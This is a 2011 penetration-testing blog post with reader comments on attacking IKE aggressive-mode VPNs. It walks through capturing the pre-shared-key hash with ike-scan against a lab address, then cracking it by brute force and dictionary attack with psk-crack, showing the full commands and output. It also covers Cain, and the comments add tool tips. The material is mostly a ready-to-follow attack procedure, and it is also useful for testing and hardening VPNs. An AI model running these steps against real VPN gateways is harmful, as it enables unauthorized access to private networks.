carnal0wnage [Shared Reader]

Wednesday, December 7, 2011

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

There hasnt been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf


In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:
$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)
To save with some output:
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
To dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.


10 comments:

ax0us said...

Great Post..Helpful for me .. I am also currently working on VPN security .. here is my post about the same topic .. http://ax0us.blogspot.com/2011/11/breaking-vpn-pre-shared-keypsk.html.

tugrik said...

To use Cain... use ike-scan for Windows?

http://www.nta-monitor.com/tools/ike-scan/

CG said...

wow, i suck... ;-/

danielweis said...

fantastic post nice work :)

ax0us said...

@tugrik,@CG .. Yea we can use IKE-SCAN windows version.

Also use "ikeprobe" windows based tool to find vulnerable devices.

CG said...

pretty sure ikeprobe was the one that would never work for me. too lazy to look atm though

ax0us said...

Exactly , partially not worked for me too .. so I created New VPN connection and tried to connect in aggressive mode and sniffed hash using Cain.

Anonymous said...

Very helpful.

The main mode requires a static IP at both the ends. I cannot switch to aggressive mode since I DHCP IP address to the VPN clients that login.

Please let me know if there is any workaround or if I have to use the aggressive mode and accept the risk.

Thanks in advance.

Anonymous said...

just use vpn ninja and then let me know if you don't like it, is awesome!! the website is www.vpnninja.com

bemonolit said...

ike-scan -A 192.168.1.2 --id=myid -P192-168-1-2key
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.1.2 Aggressive Mode Handshake returned HDR=(CKY-R=0000000000000000) (4 transforms) KeyExchange(128 bytes) Nonce(20 bytes) ID(Type=ID_USER_FQDN, Value=myid)

Ending ike-scan 1.9: 1 hosts scanned in 0.012 seconds (82.82 hosts/sec). 1 returned handshake; 0 returned notify

But where is output ?Where is handshake?Thank you